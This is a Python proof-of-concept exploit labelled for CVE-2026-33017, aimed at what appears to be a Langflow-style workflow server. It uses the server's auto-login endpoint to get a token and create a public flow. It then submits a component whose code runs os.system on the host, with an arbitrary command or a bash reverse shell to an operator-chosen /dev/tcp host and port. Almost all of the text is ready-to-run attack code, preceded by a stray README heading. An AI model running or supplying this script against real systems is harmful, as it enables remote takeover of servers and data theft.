# README.md
# Rendering markdown...
import requests
import argparse
import sys
def create_flow(host, port, timeout=5):
    """Log in through the auto-login endpoint and create a new public flow.

    Args:
        host: Target hostname or IP. May already start with ``http://`` or
            ``https://``; otherwise ``http://`` is prepended.
        port: Port appended to ``host`` when building the base URL.
        timeout: Per-request timeout in seconds handed to ``requests``.

    Returns:
        The ``id`` value from the flow-creation response.

    Raises:
        requests.HTTPError: If the login or flow-creation request returns an
            error status (raised by ``raise_for_status``).
        RuntimeError: If the login response carries no ``access_token`` or
            the flow-creation response carries no ``id``.

    Other exceptions raised by ``requests`` (for example on connection
    failure) are not caught here and propagate to the caller.
    """
    if host.startswith(("http://", "https://")):
        base_url = f"{host}:{port}"
    else:
        base_url = f"http://{host}:{port}"

    # Using the session as a context manager closes it on every exit path.
    with requests.Session() as session:
        print("[*] Fetching access token...")
        login_res = session.get(f"{base_url}/api/v1/auto_login", timeout=timeout)
        if not login_res.ok:
            print(f"[!] Failed to login. Server returned: {login_res.text}")
            login_res.raise_for_status()

        token = login_res.json().get("access_token")
        if not token:
            # Fail here instead of sending the literal header "Bearer None".
            raise RuntimeError("Login response did not contain an access_token")

        session.headers.update({
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json",
        })

        print("[*] Creating a new public flow...")
        flow_payload = {
            "name": "test",
            "data": {"nodes": [], "edges": []},
            "access_type": "PUBLIC",
        }
        flow_res = session.post(
            f"{base_url}/api/v1/flows/", json=flow_payload, timeout=timeout
        )
        if not flow_res.ok:
            print(f"[!] Failed to create flow. Server returned: {flow_res.text}")
            flow_res.raise_for_status()

        flow_id = flow_res.json().get("id")

    if not flow_id:
        # A missing id would otherwise be returned as None and end up in a URL.
        raise RuntimeError("Flow creation response did not contain an id")

    print(f"[+] Public Flow ID created: {flow_id}")
    return flow_id
def run_reverse_shell(host, port, lhost, lport, flow_id, timeout=5):
    """Build the reverse-shell component source and submit it via ``exploit``.

    Args:
        host: Target hostname or IP, forwarded to ``exploit``.
        port: Target port, forwarded to ``exploit``.
        lhost: Address interpolated into the connect-back command.
        lport: Port interpolated into the connect-back command.
        flow_id: Flow identifier forwarded to ``exploit``.
        timeout: Request timeout in seconds, forwarded to ``exploit``.

    Returns:
        Whatever ``exploit`` returned for the submission.
    """
    print(f"[*] Sending reverse shell to connect back to {lhost}:{lport}")

    component_code = f"import os, socket, json as _json\n\n_command = os.system(\"bash -c 'bash >& /dev/tcp/{lhost}/{lport} 0>&1'\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n display_name=\"X\"\n outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n def r(self)->Data:\n return Data(data={{}})"

    sent = exploit(host, port, flow_id, component_code, timeout)

    # Report the outcome once, then hand the flag back to the caller.
    outcome = (
        "[+] Reverse shell command sent. Check your listener."
        if sent
        else "[!] Failed to send reverse shell command."
    )
    print(outcome)
    return sent
def exploit(host, port, flow_id, command, timeout=5):
    """POST a one-node flow whose ``code`` field is ``command`` to the build endpoint.

    The request goes to ``/api/v1/build_public_tmp/{flow_id}/flow`` with a
    ``client_id`` cookie of ``"test"``. The response status code and body are
    printed.

    Args:
        host: Target hostname or IP. May already start with ``http://`` or
            ``https://``; otherwise ``http://`` is prepended.
        port: Port appended to ``host`` when building the base URL.
        flow_id: Flow identifier placed in the request path.
        command: Component source text placed in the node's ``code`` value.
        timeout: Request timeout in seconds handed to ``requests``.

    Returns:
        True if the server answered with a non-error status. False if it
        answered with a 4xx/5xx status or the request itself failed.
    """
    if host.startswith(("http://", "https://")):
        base_url = f"{host}:{port}"
    else:
        base_url = f"http://{host}:{port}"
    build_url = f"{base_url}/api/v1/build_public_tmp/{flow_id}/flow"

    # Built outside the try block: constructing a literal dict cannot fail on
    # the network, so only the POST needs guarding.
    exploit_payload = {
        "data": {
            "nodes": [{
                "id": "Test",
                "type": "genericNode",
                "position": {"x": 0, "y": 0},
                "data": {
                    "id": "Test",
                    "type": "Test",
                    "node": {
                        "template": {
                            "code": {
                                "type": "code",
                                "required": True,
                                "show": True,
                                "multiline": True,
                                "value": command,
                                "name": "code",
                                "password": False,
                                "advanced": False,
                                "dynamic": False,
                            },
                            "_type": "Component",
                        },
                        "description": "X",
                        "base_classes": ["Data"],
                        "display_name": "Test",
                        "name": "Test",
                        "frozen": False,
                        "outputs": [{
                            "types": ["Data"],
                            "selected": "Data",
                            "name": "o",
                            "display_name": "O",
                            "method": "r",
                            "value": "__UNDEFINED__",
                            "cache": True,
                            "allows_loop": False,
                            "tool_mode": False,
                            "hidden": None,
                            "required_inputs": None,
                            "group_outputs": False,
                        }],
                        "field_order": ["code"],
                        "beta": False,
                        "edited": False,
                    },
                },
            }],
            "edges": [],
        },
        "inputs": None,
    }

    try:
        # Using the session as a context manager closes it on every exit path.
        with requests.Session() as session:
            response = session.post(
                build_url,
                json=exploit_payload,
                cookies={"client_id": "test"},
                timeout=timeout,
            )
    except requests.RequestException as e:
        print(f"[!] An unexpected error occurred: {e}")
        return False

    print(f"[*] Status Code: {response.status_code}")
    print("[*] Response Body:")
    print(response.text)
    # An error status means the server rejected the request, so it must not
    # be reported to callers as a success.
    return response.ok
def main():
    """Parse command-line arguments and run the requested action on one target.

    Returns:
        Process exit code: 0 when ``exploit``/``run_reverse_shell`` reports
        success, 1 when required arguments are missing, the action fails, or
        a ``requests`` error is raised while talking to the target.
    """
    parser = argparse.ArgumentParser(description="PoC for CVE-2026-33017")
    parser.add_argument("host", nargs="?", help="Target IP or hostname")
    parser.add_argument("-p", "--port", type=int, default=7860, help="Target HTTP port (default: 7860)")
    parser.add_argument("-id", "--flow_id", help="Public Flow ID (a new one will be created if omitted)")
    parser.add_argument("--command", "-c", help="Custom command to run on target")
    parser.add_argument("--shell", action="store_true", help="Launch a Bash-based reverse shell")
    parser.add_argument("--lhost", help="Your IP for reverse shell")
    parser.add_argument("--lport", type=int, default=4444, help="Your port for reverse shell (default: 4444)")
    parser.add_argument("-t", "--timeout", type=int, default=5, help="Connection timeout (default: 5s)")
    args = parser.parse_args()

    def process_host(host):
        """Validate the chosen action for ``host`` and run it; return an exit code."""
        port = args.port
        timeout = args.timeout
        print(f"[*] Target: {host}:{port}")

        if not args.shell and not args.command:
            print(f"[-] No action specified for {host}:{port}. Use --shell or --command.")
            return 1
        if args.shell and not args.lhost:
            print(f"[-] --lhost is required for reverse shell. Skipping {host}:{port}.")
            return 1

        # argparse names the attribute after the first long option string
        # ("--flow_id"), so the value is args.flow_id; there is no args.id.
        if args.flow_id:
            flow_id = args.flow_id
        else:
            flow_id = create_flow(host, port, timeout)

        # --shell takes precedence when both --shell and --command are given.
        if args.shell:
            success = run_reverse_shell(host, port, args.lhost, args.lport, flow_id, timeout)
            return 0 if success else 1

        # args.command is interpolated verbatim into the generated source.
        command = f"import os, socket, json as _json\n\n_command = os.system(\"{args.command}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n display_name=\"X\"\n outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n def r(self)->Data:\n return Data(data={{}})"
        # Forward the user-selected timeout; it was previously dropped here.
        success = exploit(host, port, flow_id, command, timeout)
        return 0 if success else 1

    if not args.host:
        print("[-] No host specified.")
        return 1

    try:
        return process_host(args.host)
    except requests.RequestException as exc:
        # Report network/HTTP failures as a message and a non-zero exit code
        # instead of an unhandled traceback.
        print(f"[!] Request to {args.host}:{args.port} failed: {exc}")
        return 1
# Script entry point: use main()'s return value as the process exit status.
if __name__ == "__main__":
    raise SystemExit(main())